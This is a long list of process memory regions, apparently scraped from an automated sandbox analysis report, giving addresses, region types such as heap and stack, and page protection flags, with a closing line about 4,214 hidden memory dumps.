stack
page read and write
7FFE99DBA000
unkown
page execute and write copy
CD4FB7E000
stack
page read and write
20492B5C000
heap
page read and write
FC516FC000
stack
page read and write
20492B36000
heap
page read and write
493AEFC000
stack
page read and write
2413350D000
heap
page read and write
18859BAE000
heap
page read and write
152B52C0000
heap
page read and write
1DA00085000
heap
page read and write
1B7EEC90000
heap
page read and write
24133551000
heap
page read and write
24133657000
heap
page read and write
CD4F70E000
stack
page read and write
270AE612000
heap
page read and write
20492AF5000
heap
page read and write
1E2C9800000
heap
page read and write
20492AF5000
heap
page read and write
1DA00097000
heap
page read and write
270AEF60000
heap
page read and write
20492B5E000
heap
page read and write
2413345A000
heap
page read and write
88ED47E000
stack
page read and write
29ADF761000
heap
page read and write
24132C48000
heap
page read and write
7FFE904D0000
unkown
page readonly
7FFE15E10000
trusted library allocation
page read and write
2B4B8928000
heap
page read and write
25340B14000
heap
page read and write
7FFE99DBC000
unkown
page read and write
EFF727E000
stack
page read and write
1E02DCA0000
heap
page read and write
20492B60000
heap
page read and write
17134ACB000
heap
page read and write
18D34730000
heap
page read and write
24133525000
heap
page read and write
287A3C80000
heap
page read and write
253DC390000
direct allocation
page read and write
270AEF38000
heap
page read and write
2413344D000
heap
page read and write
24132C16000
heap
page read and write
7FF7C7286000
unkown
page read and write
1F61A41D000
heap
page read and write
253DC492000
direct allocation
page read and write
1F61A415000
heap
page read and write
1DBD7CFD000
heap
page read and write
24133486000
heap
page read and write
2413364F000
heap
page read and write
20494509000
trusted library allocation
page read and write
24133659000
heap
page read and write
1F16B3C0000
heap
page read and write
2C160BB0000
heap
page read and write
2089AA78000
heap
page read and write
24133F7F000
heap
page read and write
2B4B8B84000
heap
page read and write
24132C41000
heap
page read and write
20C95685000
heap
page read and write
1CAA7D50000
heap
page read and write
7FFE15B6C000
trusted library allocation
page execute and read and write
29425E30000
heap
page read and write
24133506000
heap
page read and write
1DA00083000
heap
page read and write
287A3B70000
heap
page read and write
270AE5E4000
heap
page read and write
1CAA7D71000
heap
page read and write
24130A8A000
heap
page read and write
109CFEE000
stack
page read and write
7FFE15D90000
trusted library allocation
page read and write
1D3E27E4000
heap
page read and write
174CED70000
heap
page read and write
1DA003A4000
heap
page read and write
270AEF53000
heap
page read and write
1DF55024000
heap
page read and write
174CEC70000
heap
page read and write
235D1748000
heap
page read and write
1F16B24C000
heap
page read and write
2413340D000
heap
page read and write
F933CFC000
stack
page read and write
24133546000
heap
page read and write
2413365E000
heap
page read and write
24133521000
heap
page read and write
2F8EC7E000
stack
page read and write
1616DDF0000
heap
page read and write
24133041000
heap
page read and write
2413350D000
heap
page read and write
1CFB947D000
heap
page read and write
6051F4D000
stack
page read and write
5BF13F6000
stack
page read and write
1DA00098000
heap
page read and write
1DAD0192000
heap
page read and write
1984C902000
heap
page read and write
24133958000
direct allocation
page read and write
BEDBAFF000
unkown
page read and write
2089AA93000
heap
page read and write
7FFE94455000
unkown
page execute and read and write
7FF7C7268000
unkown
page write copy
7FFE15ADD000
trusted library allocation
page execute and read and write
20492AF5000
heap
page read and write
55CAA7E000
stack
page read and write
7FFE904D1000
unkown
page execute and read and write
20C94ACE000
trusted library allocation
page read and write
109D87D000
stack
page read and write
1616DC7C000
heap
page read and write
19851DD0000
trusted library allocation
page read and write
2089AF98000
heap
page read and write
24130A56000
heap
page read and write
1CAA7D71000
heap
page read and write
2533F28A000
heap
page read and write
7FFE15CB0000
trusted library allocation
page read and write
2413343B000
heap
page read and write
1ED46C37000
heap
page read and write
1DA002AC000
heap
page read and write
1F16B25A000
heap
page read and write
20C95753000
heap
page read and write
2413366F000
heap
page read and write
1BFE6CCB000
heap
page read and write
493AFFF000
unkown
page read and write
1FABFC60000
heap
page read and write
6884FF000
stack
page read and write
20492AF5000
heap
page read and write
20492B45000
heap
page read and write
2089AF90000
heap
page read and write
24132C16000
heap
page read and write
7FFE15C60000
trusted library allocation
page read and write
253D8DE1000
heap
page read and write
24133F8C000
heap
page read and write
29AF1FE4000
heap
page read and write
2D8102F1000
trusted library allocation
page read and write
2089AAA8000
heap
page read and write
19851D50000
trusted library allocation
page read and write
271488DB000
heap
page read and write
7A9E0FF000
stack
page read and write
1F16B8FA000
heap
page read and write
1F61A3EB000
heap
page read and write
1DF54D21000
heap
page read and write
2B4B8931000
heap
page read and write
2413351F000
heap
page read and write
76DEBFF000
stack
page read and write
1E2C988A000
heap
page read and write
88ED87C000
stack
page read and write
1CFB9491000
heap
page read and write
1ED46C81000
heap
page read and write
244381F0000
heap
page read and write
24438268000
heap
page read and write
1616DDE7000
heap
page read and write
2089AA52000
heap
page read and write
2533F260000
heap
page read and write
2D87C0A1000
heap
page read and write
20492B51000
heap
page read and write
24133556000
heap
page read and write
FC515F9000
stack
page read and write
24130A40000
heap
page read and write
24133496000
heap
page read and write
27148B35000
heap
page read and write
1ED46B50000
heap
page read and write
20C94891000
heap
page read and write
24132E80000
heap
page read and write
1ED46B70000
trusted library allocation
page read and write
270AE5B9000
heap
page read and write
24132E80000
heap
page read and write
24132C39000
heap
page read and write
270AE5B7000
heap
page read and write
1616DC47000
heap
page read and write
24132FB9000
heap
page read and write
2533F27E000
heap
page read and write
1C8A6210000
heap
page read and write
29196FB8000
heap
page read and write
109D4FE000
stack
page read and write
1ED47211000
heap
page read and write
1C8A5FF0000
heap
page read and write
1ED4722D000
heap
page read and write
1FABF684000
heap
page read and write
127717E000
stack
page read and write
16199B01000
trusted library allocation
page read and write
20C9567C000
heap
page read and write
1FDEF1A0000
heap
page read and write
270AEF4B000
heap
page read and write
24133558000
heap
page read and write
1DA002B7000
heap
page read and write
1FABFC78000
heap
page read and write
2360FBF0000
heap
page read and write
2C160D35000
heap
page read and write
1AEA6E0C000
heap
page read and write
1DB1C680000
heap
page read and write
24133514000
heap
page read and write
2B4B892A000
heap
page read and write
270AF242000
heap
page read and write
253D8D90000
heap
page read and write
270AE5F9000
heap
page read and write
7FFE15A94000
trusted library allocation
page read and write
1DAD017A000
heap
page read and write
1FABF617000
heap
page read and write
19851E00000
trusted library allocation
page read and write
29ADF761000
heap
page read and write
24132F84000
heap
page read and write
1F16B228000
heap
page read and write
1ED47217000
heap
page read and write
7FF6FFC94000
unkown
page readonly
1F16D1A0000
heap
page read and write
2D87BE50000
heap
page read and write
F257EFC000
stack
page read and write
2533EA49000
heap
page read and write
2221A835000
heap
page read and write
19851D40000
trusted library allocation
page read and write
7FFE15C50000
trusted library allocation
page read and write
20C955F1000
heap
page read and write
20C94C60000
trusted library allocation
page read and write
1ED46C81000
heap
page read and write
253D8E10000
heap
page read and write
1BFE6C40000
heap
page read and write
24133C18000
heap
page read and write
7B4EB2E000
stack
page read and write
1ED46A50000
heap
page read and write
7FFE15D10000
trusted library allocation
page read and write
24133565000
heap
page read and write
1F877E10000
heap
page read and write
152B52E1000
heap
page read and write
7FFE94440000
unkown
page readonly
7FFE15ACB000
trusted library allocation
page read and write
2533EA16000
heap
page read and write
241309B0000
heap
page read and write
7FFE15CC0000
trusted library allocation
page read and write
2C160D40000
heap
page read and write
1DBD7D60000
heap
page read and write
19851EA0000
trusted library allocation
page read and write
1616FC62000
heap
page read and write
174CED57000
heap
page read and write
1FABF61F000
heap
page read and write
1F61A415000
heap
page read and write
88EE3FE000
stack
page read and write
2089AF9D000
heap
page read and write
1616DDEA000
heap
page read and write
25340B04000
heap
page read and write
2089AA90000
heap
page read and write
20494520000
heap
page read and write
2413365E000
heap
page read and write
1FB145E0000
heap
page read and write
161B18D6000
heap
page read and write
24133525000
heap
page read and write
2D87BD77000
heap
page read and write
20C9560A000
heap
page read and write
2089AFAC000
heap
page read and write
1616FC50000
heap
page read and write
1DBD8373000
heap
page read and write
2263E5BB000
heap
page read and write
1FABF5C0000
trusted library allocation
page read and write
7FFE760AB000
unkown
page execute and read and write
24133657000
heap
page read and write
20492AC1000
heap
page read and write
2413355D000
heap
page read and write
22E8B6D0000
heap
page read and write
2360FB90000
heap
page read and write
1F16B914000
heap
page read and write
1FABFC89000
heap
page read and write
1DACF15F000
heap
page read and write
7B4EEFE000
stack
page read and write
1FABF684000
heap
page read and write
253DA930000
direct allocation
page read and write
2533EA47000
heap
page read and write
24130A5D000
heap
page read and write
24133675000
heap
page read and write
29ADF944000
heap
page read and write
1F16B250000
heap
page read and write
AB1B3FF000
stack
page read and write
24132BEA000
heap
page read and write
2D87C0D3000
heap
page read and write
1F16B929000
heap
page read and write
2636AE90000
heap
page read and write
1DA0082A000
heap
page read and write
6E731DE000
stack
page read and write
1616DC97000
heap
page read and write
F5870FB000
stack
page read and write
1616FC6D000
heap
page read and write
88EE27E000
unkown
page readonly
1F16B24A000
heap
page read and write
1FABFC81000
heap
page read and write
20494510000
trusted library allocation
page read and write
20492B6E000
heap
page read and write
270AEF67000
heap
page read and write
20494505000
trusted library allocation
page read and write
253D8DEE000
heap
page read and write
7FFE15D50000
trusted library allocation
page read and write
241334A4000
heap
page read and write
24133EB8000
heap
page read and write
20492B45000
heap
page read and write
20C94ADA000
trusted library allocation
page read and write
23753540000
heap
page read and write
24132BDC000
heap
page read and write
1984C800000
heap
page read and write
23FDF088000
heap
page read and write
1DAD0164000
heap
page read and write
220FF031000
heap
page read and write
24130A5D000
heap
page read and write
1DBD7CFA000
heap
page read and write
24133515000
heap
page read and write
F787DEC000
stack
page read and write
24130A8B000
heap
page read and write
2533EA30000
heap
page read and write
7EA9BFF000
stack
page read and write
24133008000
heap
page read and write
1DA02124000
heap
page read and write
24133657000
heap
page read and write
2D801E00000
trusted library allocation
page read and write
1FDEF400000
heap
page read and write
2413350F000
heap
page read and write
24132C0F000
heap
page read and write
220FEFA0000
heap
page read and write
2413301A000
heap
page read and write
1F16B91D000
heap
page read and write
1DAD0192000
heap
page read and write
270AEF5D000
heap
page read and write
7FFE8F41D000
unkown
page read and write
20492B64000
heap
page read and write
1DAD00A0000
heap
page read and write
24EACFD8000
heap
page read and write
241333B0000
heap
page read and write
2413352D000
heap
page read and write
2089AB40000
trusted library allocation
page read and write
270AEF5F000
heap
page read and write
1DBD7D36000
heap
page read and write
2089AA90000
heap
page read and write
24133513000
heap
page read and write
1FABF64F000
heap
page read and write
2413365C000
heap
page read and write
2125C3B1000
heap
page read and write
18207A70000
heap
page read and write
1FB143A0000
heap
page read and write
24132C56000
heap
page read and write
23FDEFB0000
heap
page read and write
1FABF646000
heap
page read and write
1DBD7CFA000
heap
page read and write
2985B1B000
stack
page read and write
1DA00820000
heap
page read and write
7FFE15AD4000
trusted library allocation
page read and write
1DACCF62000
heap
page read and write
1BFE6DC0000
heap
page read and write
C758FFE000
stack
page read and write
1616DCA7000
heap
page read and write
152B52E1000
heap
page read and write
241335A9000
heap
page read and write
1F61A3E5000
heap
page read and write
2533EA42000
heap
page read and write
F4310FF000
stack
page read and write
24130A31000
heap
page read and write
253D902B000
direct allocation
page read and write
2413349E000
heap
page read and write
2360FCAB000
heap
page read and write
17134AEC000
heap
page read and write
241334A4000
heap
page read and write
20492AF0000
heap
page read and write
2413356A000
heap
page read and write
1DA02124000
heap
page read and write
7FFE15E00000
trusted library allocation
page read and write
1DACCEB0000
heap
page read and write
1F877F10000
heap
page read and write
1DACF041000
heap
page read and write
241333BA000
heap
page read and write
24133FD4000
heap
page read and write
20C94AF0000
heap
page read and write
20492AC0000
heap
page read and write
1C3C591D000
heap
page read and write
A2B4BB2000
stack
page read and write
174CED7F000
heap
page read and write
C2A05B8000
stack
page read and write
20492B1E000
heap
page read and write
2413348F000
heap
page read and write
24438258000
heap
page read and write
1DA0008F000
heap
page read and write
1FABF677000
heap
page read and write
1F16B91D000
heap
page read and write
24132EEC000
heap
page read and write
1ED48B0E000
heap
page read and write
2413352F000
heap
page read and write
2089AA40000
heap
page read and write
7FFE75EFD000
unkown
page execute and read and write
21A1A211000
heap
page read and write
1DA002BE000
heap
page read and write
19852000000
heap
page read and write
24133F8D000
heap
page read and write
29196FC1000
heap
page read and write
1DAD0132000
heap
page read and write
20C94DF0000
trusted library allocation
page read and write
24133565000
heap
page read and write
24133F88000
heap
page read and write
20D80591000
heap
page read and write
53F7AFF000
stack
page read and write
270AE65A000
heap
page read and write
1F16B293000
heap
page read and write
1FABFC6E000
heap
page read and write
253DC370000
direct allocation
page read and write
1F16B253000
heap
page read and write
1616DCA1000
heap
page read and write
3B056FF000
stack
page read and write
7FFE15E40000
trusted library allocation
page read and write
24132BE5000
heap
page read and write
24132C39000
heap
page read and write
24132BD0000
heap
page read and write
109D7FF000
stack
page read and write
20C95668000
heap
page read and write
241333A0000
heap
page read and write
7FFE99DB9000
unkown
page execute and read and write
1F16D1A4000
heap
page read and write
1ED46B70000
trusted library allocation
page read and write
2089AC30000
heap
page read and write
2413344D000
heap
page read and write
1616DC7A000
heap
page read and write
1DA00072000
heap
page read and write
1DBD7D12000
heap
page read and write
1616DC89000
heap
page read and write
1F16B92C000
heap
page read and write
24132C4C000
heap
page read and write
24132FF2000
heap
page read and write
7FF7C7269000
unkown
page write copy
7FFE15B60000
trusted library allocation
page read and write
24133651000
heap
page read and write
2413366B000
heap
page read and write
1DBD84C8000
heap
page read and write
253D8DE9000
heap
page read and write
2533F289000
heap
page read and write
270AEF37000
heap
page read and write
20C955F7000
heap
page read and write
226F4C70000
heap
page read and write
7FFE15C90000
trusted library allocation
page read and write
1616DDEA000
heap
page read and write
1DBD7D3E000
heap
page read and write
16197A50000
heap
page read and write
1FABF5A0000
heap
page read and write
2413342B000
heap
page read and write
20C94ACE000
trusted library allocation
page read and write
20D80760000
heap
page read and write
1DBD7CCB000
heap
page read and write
1DBD84CC000
heap
page read and write
1E2C989F000
heap
page read and write
1DACCFA2000
heap
page read and write
2413355D000
heap
page read and write
2413352D000
heap
page read and write
24130A5D000
heap
page read and write
24133041000
heap
page read and write
1DB1C5A1000
heap
page read and write
2089B0AB000
heap
page read and write
2089AF95000
heap
page read and write
20492AD2000
heap
page read and write
1DA0082E000
heap
page read and write
7FFE15CE0000
trusted library allocation
page read and write
20C95680000
heap
page read and write
270AEF85000
heap
page read and write
1ED46C8B000
heap
page read and write
1DA0004E000
heap
page read and write
1FAC14F4000
heap
page read and write
62E18FF000
stack
page read and write
241334B0000
heap
page read and write
1FDEF404000
heap
page read and write
7C2DB7E000
stack
page read and write
241338D4000
direct allocation
page read and write
1616DC7A000
heap
page read and write
235D16A5000
heap
page read and write
29196FC1000
heap
page read and write
2533F292000
heap
page read and write
7FFE15F50000
trusted library allocation
page read and write
2089AABC000
heap
page read and write
1E777CD0000
heap
page read and write
2E7672C000
stack
page read and write
18FDFCBA000
heap
page read and write
24133B94000
heap
page read and write
1DF54D00000
heap
page read and write
2089B0A7000
heap
page read and write
1AEA6E3B000
heap
page read and write
1FAC14F3000
heap
page read and write
7FFE94AC9000
unkown
page execute and read and write
7E8D1AC000
stack
page read and write
1C3C5810000
heap
page read and write
1BFE6CB0000
heap
page read and write
20492B19000
heap
page read and write
24133F94000
heap
page read and write
24133513000
heap
page read and write
20492B6E000
heap
page read and write
7FFE15AB0000
trusted library allocation
page read and write
2533EBC0000
heap
page read and write
69992FF000
stack
page read and write
270AEF6D000
heap
page read and write
24133564000
heap
page read and write
161B19C1000
heap
page read and write
2D810021000
trusted library allocation
page read and write
24130A8B000
heap
page read and write
2533EA2A000
heap
page read and write
3A0E44E000
stack
page read and write
1F16B915000
heap
page read and write
7FFE15ADB000
trusted library allocation
page execute and read and write
FC50FA3000
stack
page read and write
2985F7E000
stack
page read and write
161992C0000
heap
page execute and read and write
2089B0AE000
heap
page read and write
24133F91000
heap
page read and write
270AF0E5000
heap
page read and write
241333C5000
heap
page read and write
68090FF000
stack
page read and write
22E8B770000
heap
page read and write
20C94AD7000
trusted library allocation
page read and write
1ED46EBA000
heap
page read and write
241333B0000
heap
page read and write
241333D4000
heap
page read and write
2533EA26000
heap
page read and write
29AF1C3B000
heap
page read and write
5F1077000
stack
page read and write
1616DD40000
heap
page read and write
2636AE84000
heap
page read and write
2089AFA9000
heap
page read and write
1DAD00C4000
heap
page read and write
20C94AD5000
trusted library allocation
page read and write
FE67B0B000
stack
page read and write
1DBD84C7000
heap
page read and write
24133F69000
heap
page read and write
1F16B908000
heap
page read and write
270AE63E000
heap
page read and write
1616FC63000
heap
page read and write
253DC4D0000
direct allocation
page read and write
24133562000
heap
page read and write
24130A8A000
heap
page read and write
7FFE99E5E000
unkown
page read and write
241333D4000
heap
page read and write
1DAD0180000
heap
page read and write
24133473000
heap
page read and write
29197280000
heap
page read and write
24132C0F000
heap
page read and write
1616FC74000
heap
page read and write
270AF237000
heap
page read and write
1616DD80000
trusted library allocation
page read and write
2360FCBC000
heap
page read and write
270AEF52000
heap
page read and write
1F16B227000
heap
page read and write
7FF6FFC50000
unkown
page readonly
20492ABF000
heap
page read and write
2C160BA7000
heap
page read and write
20C94ADE000
trusted library allocation
page read and write
20492AAF000
heap
page read and write
20492B27000
heap
page read and write
2413366F000
heap
page read and write
24132E7F000
heap
page read and write
253DC51D000
direct allocation
page read and write
69F5E7F000
stack
page read and write
24130A31000
heap
page read and write
29425FB5000
heap
page read and write
1ED46C73000
heap
page read and write
1DBD7C97000
heap
page read and write
270AEF7E000
heap
page read and write
1F16D1B4000
heap
page read and write
2125DDD0000
heap
page read and write
7FF6FFC8E000
unkown
page write copy
2221A660000
heap
page read and write
1E2C98D8000
heap
page read and write
1DAD02A5000
heap
page read and write
253DC490000
direct allocation
page read and write
EA745FF000
stack
page read and write
1F877FC7000
heap
page read and write
2533F295000
heap
page read and write
20C94891000
heap
page read and write
20C94889000
heap
page read and write
20D80780000
heap
page read and write
24ECC2D0000
heap
page read and write
2360FCBA000
heap
page read and write
1FABF677000
heap
page read and write
7FFE15AD0000
trusted library allocation
page read and write
1FABFC60000
heap
page read and write
24133473000
heap
page read and write
20C9566C000
heap
page read and write
F2580FF000
stack
page read and write
2D87BE40000
heap
page execute and read and write
1984D7A1000
trusted library allocation
page read and write
7FFE15D10000
trusted library allocation
page read and write
24132BA9000
heap
page read and write
241333A4000
heap
page read and write
1DB1C5A1000
heap
page read and write
1DBD7CA7000
heap
page read and write
29ADF75B000
heap
page read and write
88ED37E000
unkown
page readonly
2413352F000
heap
page read and write
241333D4000
heap
page read and write
24132C0A000
heap
page read and write
23FDF089000
heap
page read and write
270AEF4E000
heap
page read and write
1CAA7D6A000
heap
page read and write
1F1A8A40000
heap
page read and write
24ECC290000
heap
page read and write
2F08D0C000
stack
page read and write
7FF7C727E000
unkown
page read and write
2413365E000
heap
page read and write
2125C3BE000
heap
page read and write
1DA00064000
heap
page read and write
1ED46EB4000
heap
page read and write
22E8B790000
heap
page read and write
1ED46C03000
heap
page read and write
20C94C64000
trusted library allocation
page read and write
20C94CE4000
heap
page read and write
7FFE75EC5000
unkown
page execute and read and write
174CED70000
heap
page read and write
2413351B000
heap
page read and write
24133651000
heap
page read and write
BE08DFF000
unkown
page read and write
1CAA7D5A000
heap
page read and write
2413352D000
heap
page read and write
2D80118D000
trusted library allocation
page read and write
1FAC14F1000
heap
page read and write
1F877FAF000
heap
page read and write
1ED46C00000
heap
page read and write
1DA002C8000
heap
page read and write
24133960000
direct allocation
page read and write
21A1A180000
heap
page read and write
1F16B939000
heap
page read and write
C586FF000
stack
page read and write
7A9DEFB000
stack
page read and write
1F16B8FB000
heap
page read and write
241334B0000
heap
page read and write
1DBD7D28000
heap
page read and write
7FF7C71E1000
unkown
page execute read
1DBD84E0000
heap
page read and write
24133674000
heap
page read and write
7FFE15D80000
trusted library allocation
page read and write
24132C4B000
heap
page read and write
1DA00072000
heap
page read and write
253D8E06000
heap
page read and write
605227E000
stack
page read and write
1616DC78000
heap
page read and write
2C160B80000
heap
page read and write
1FABF681000
heap
page read and write
20492C70000
trusted library allocation
page read and write
1AEA6E2C000
heap
page read and write
24132F9C000
heap
page read and write
2089B0A0000
heap
page read and write
1F61A3F7000
heap
page read and write
7A9DFFF000
unkown
page read and write
2533EA3A000
heap
page read and write
1DBD7F4A000
heap
page read and write
1DBD7D34000
heap
page read and write
24EACFF0000
heap
page read and write
23639970000
heap
page read and write
1619B2D4000
trusted library allocation
page read and write
3B05478000
stack
page read and write
1DA002BE000
heap
page read and write
7A9A0FF000
stack
page read and write
7FFE15E30000
trusted library allocation
page read and write
7FFE75E13000
unkown
page execute and read and write
18D34940000
heap
page read and write
2D87B620000
heap
page readonly
20C94CE0000
heap
page read and write
7FFE8FF98000
unkown
page read and write
1F16B266000
heap
page read and write
A2B4BA4000
stack
page read and write
2533F28C000
heap
page read and write
270AE629000
heap
page read and write
24ECC635000
heap
page read and write
6E737AF000
stack
page read and write
241334A6000
heap
page read and write
270AEF53000
heap
page read and write
1C46EC10000
heap
page read and write
2089AAB1000
heap
page read and write
1F1A8AE1000
heap
page read and write
18859B9D000
heap
page read and write
1DACCEB9000
heap
page read and write
24133463000
heap
page read and write
1F16B42A000
heap
page read and write
161B19A0000
heap
page read and write
1ED46C81000
heap
page read and write
1B5C2550000
heap
page read and write
2089C99E000
heap
page read and write
9D3ABFF000
stack
page read and write
24132C10000
heap
page read and write
7FFE99E59000
unkown
page execute and read and write
20D80588000
heap
page read and write
FC50FEE000
stack
page read and write
2413396C000
direct allocation
page read and write
270AE5F6000
heap
page read and write
88EE47E000
unkown
page readonly
253D8DD7000
heap
page read and write
79848FC000
stack
page read and write
1ED46C07000
heap
page read and write
17134BDA000
heap
page read and write
1DA000AE000
heap
page read and write
20492B68000
heap
page read and write
2125DC30000
heap
page read and write
20D80591000
heap
page read and write
1984D9B0000
trusted library section
page readonly
7FF6FFC51000
unkown
page execute read
1CFB9491000
heap
page read and write
1DACCFAE000
heap
page read and write
16199394000
heap
page read and write
24133525000
heap
page read and write
253D8E21000
heap
page read and write
2636AD57000
heap
page read and write
1DA002CD000
heap
page read and write
1DBD7C8A000
heap
page read and write
1DF54D0B000
heap
page read and write
18207A90000
heap
page read and write
241334B0000
heap
page read and write
7FFE8F3F1000
unkown
page execute and read and write
20492B12000
heap
page read and write
20C95670000
heap
page read and write
1FAC14FE000
heap
page read and write
1DBD7E80000
trusted library allocation
page read and write
19852065000
heap
page read and write
287A3C74000
heap
page read and write
1FABF662000
heap
page read and write
2985B9F000
stack
page read and write
241334EA000
heap
page read and write
1FABF8EA000
heap
page read and write
20C95621000
heap
page read and write
2263E5D1000
heap
page read and write
1DBD7C88000
heap
page read and write
36102FC000
stack
page read and write
1DF54F00000
heap
page read and write
20492B6E000
heap
page read and write
1DBD7D24000
heap
page read and write
2D879FF0000
heap
page read and write
270AE629000
heap
page read and write
1ED46C04000
heap
page read and write
7FFE75D91000
unkown
page execute and read and write
7FFE15D40000
trusted library allocation
page read and write
1CAA7CF0000
heap
page read and write
18D349E4000
heap
page read and write
1DBD7CB3000
heap
page read and write
2363997B000
heap
page read and write
270AEF4B000
heap
page read and write
2089AA90000
heap
page read and write
1616DC97000
heap
page read and write
24133502000
heap
page read and write
24133F7C000
heap
page read and write
29AF1C51000
heap
page read and write
2089ABD0000
heap
page read and write
2F8EBFE000
stack
page read and write
1616DDF7000
heap
page read and write
1616DDF8000
heap
page read and write
7A99EFC000
stack
page read and write
1ED46C73000
heap
page read and write
88ED67B000
stack
page read and write
24133041000
heap
page read and write
270AF238000
heap
page read and write
CD4FAFF000
stack
page read and write
24132C56000
heap
page read and write
1AEA6DE8000
heap
page read and write
19851F70000
remote allocation
page read and write
1DAD013A000
heap
page read and write
1ED46C9E000
heap
page read and write
241333A4000
heap
page read and write
24130A63000
heap
page read and write
24132C62000
heap
page read and write
16197790000
heap
page read and write
7FFE904EB000
unkown
page execute and read and write
16199BAF000
trusted library allocation
page read and write
241333B0000
heap
page read and write
2533F11A000
heap
page read and write
1DBD7CA5000
heap
page read and write
29196FB8000
heap
page read and write
1DACE844000
heap
page read and write
24133539000
heap
page read and write
1ED46C7F000
heap
page read and write
2360FC98000
heap
page read and write
24130A40000
heap
page read and write
7FFE15DE0000
trusted library allocation
page read and write
ECBC9FF000
stack
page read and write
88ECCBB000
stack
page read and write
270AE643000
heap
page read and write
1FABF8E0000
heap
page read and write
7FFE15ED3000
trusted library allocation
page read and write
253D9010000
direct allocation
page read and write
1F16B25C000
heap
page read and write
1F878217000
heap
page read and write
2A2CC8F4000
heap
page read and write
2D81030B000
trusted library allocation
page read and write
270AEF66000
heap
page read and write
2413355E000
heap
page read and write
1FAC14F0000
heap
page read and write
24133FC4000
heap
page read and write
20C955F7000
heap
page read and write
1ED46C0A000
heap
page read and write
18207A60000
heap
page read and write
174CED46000
heap
page read and write
2B4B8A10000
heap
page read and write
1DAD0192000
heap
page read and write
2089B0A7000
heap
page read and write
2413366F000
heap
page read and write
2125C3B1000
heap
page read and write
24133549000
heap
page read and write
1DA00095000
heap
page read and write
24AB7338000
heap
page read and write
1F16B8FE000
heap
page read and write
1ED4720C000
heap
page read and write
1ED46C86000
heap
page read and write
2D8018F0000
trusted library allocation
page read and write
1DBD837E000
heap
page read and write
1DA002C8000
heap
page read and write
1CFB9724000
heap
page read and write
1616DE19000
heap
page read and write
2089AF91000
heap
page read and write
16197AA0000
heap
page read and write
284F345B000
heap
page read and write
2413365C000
heap
page read and write
253D8E0B000
heap
page read and write
24130A49000
heap
page read and write
20C9567C000
heap
page read and write
24132C09000
heap
page read and write
2839D7C000
stack
page read and write
20492B66000
heap
page read and write
253D8E81000
heap
page read and write
FC5127E000
stack
page read and write
241333F6000
heap
page read and write
1ED48B03000
heap
page read and write
24132FC2000
heap
page read and write
1616DC95000
heap
page read and write
1869CD30000
heap
page read and write
2089AF9D000
heap
page read and write
20C9567C000
heap
page read and write
29196EC0000
heap
page read and write
1B5C25A9000
heap
page read and write
271488B0000
heap
page read and write
241334EF000
heap
page read and write
7FFE75E50000
unkown
page execute and write copy
1DAD017A000
heap
page read and write
BE08EFF000
stack
page read and write
24ECC270000
heap
page read and write
2D80119B000
trusted library allocation
page read and write
22E8B790000
heap
page read and write
24132F9C000
heap
page read and write
2375344B000
heap
page read and write
1FABF66D000
heap
page read and write
253DC446000
direct allocation
page read and write
22E8B990000
heap
page read and write
24132F81000
heap
page read and write
29ADF660000
heap
page read and write
1869CAB0000
heap
page read and write
1F16B900000
heap
page read and write
20492B29000
heap
page read and write
1616DE29000
heap
page read and write
220FF031000
heap
page read and write
1DACCF31000
heap
page read and write
24132BF9000
heap
page read and write
7FFE76513000
unkown
page execute and read and write
1DBD7D36000
heap
page read and write
1CFB9491000
heap
page read and write
24130A57000
heap
page read and write
1DBD84E9000
heap
page read and write
24133870000
direct allocation
page read and write
220FF1E0000
heap
page read and write
20492B3C000
heap
page read and write
20C95674000
heap
page read and write
23FDF091000
heap
page read and write
270AE612000
heap
page read and write
1ED46C7D000
heap
page read and write
29ADF761000
heap
page read and write
2985E7F000
stack
page read and write
87B317F000
stack
page read and write
29ADF761000
heap
page read and write
2413344D000
heap
page read and write
1FABF647000
heap
page read and write
226F4B70000
heap
page read and write
18859B75000
heap
page read and write
1FABFC5C000
heap
page read and write
281B6160000
heap
page read and write
23FDF170000
heap
page read and write
1FDEF1B8000
heap
page read and write
1DA00048000
heap
page read and write
241334FB000
heap
page read and write
241334B0000
heap
page read and write
2533F11E000
heap
page read and write
1DB1C730000
heap
page read and write
270AEF48000
heap
page read and write
241334A6000
heap
page read and write
2413347F000
heap
page read and write
29426100000
heap
page read and write
17134AD7000
heap
page read and write
2263E5D1000
heap
page read and write
1DBD837E000
heap
page read and write
20492B15000
heap
page read and write
1DAD015A000
heap
page read and write
7FFE75C81000
unkown
page execute and read and write
3A7507F000
stack
page read and write
1DBD837B000
heap
page read and write
18FDFEB0000
heap
page read and write
20C95618000
heap
page read and write
1DA00095000
heap
page read and write
24132C0F000
heap
page read and write
1DACCEFF000
heap
page read and write
7FF6FFC91000
unkown
page read and write
20C9A672000
trusted library allocation
page read and write
1616DE19000
heap
page read and write
1DA00037000
heap
page read and write
359F3DF000
stack
page read and write
1BFE6CE1000
heap
page read and write
270AE68E000
heap
page read and write
7FFE15C63000
trusted library allocation
page read and write
1FABF580000
heap
page read and write
1ED46C75000
heap
page read and write
253DC470000
direct allocation
page read and write
1F16B1B0000
trusted library allocation
page read and write
23FDF091000
heap
page read and write
270AF246000
heap
page read and write
20492B28000
heap
page read and write
24133968000
direct allocation
page read and write
241333F6000
heap
page read and write
1616DC57000
heap
page read and write
1F16B929000
heap
page read and write
253D8E81000
heap
page read and write
1DACCFAE000
heap
page read and write
19851E14000
trusted library allocation
page read and write
20492B12000
heap
page read and write
241332A0000
heap
page read and write
1DAD01D5000
heap
page read and write
1ED46C56000
heap
page read and write
270AF23C000
heap
page read and write
2089AF8C000
heap
page read and write
7FFE8F3F0000
unkown
page readonly
287A3B90000
heap
page read and write
2263E875000
heap
page read and write
244383C4000
heap
page read and write
20492B14000
heap
page read and write
16197770000
heap
page read and write
FC518FC000
stack
page read and write
241338E4000
direct allocation
page read and write
24133669000
heap
page read and write
1ED4721D000
heap
page read and write
1984D9A0000
trusted library section
page readonly
1869C9D0000
heap
page read and write
1F1A8940000
heap
page read and write
2533EA23000
heap
page read and write
20494524000
heap
page read and write
There are 4214 hidden memdumps, click here to show them.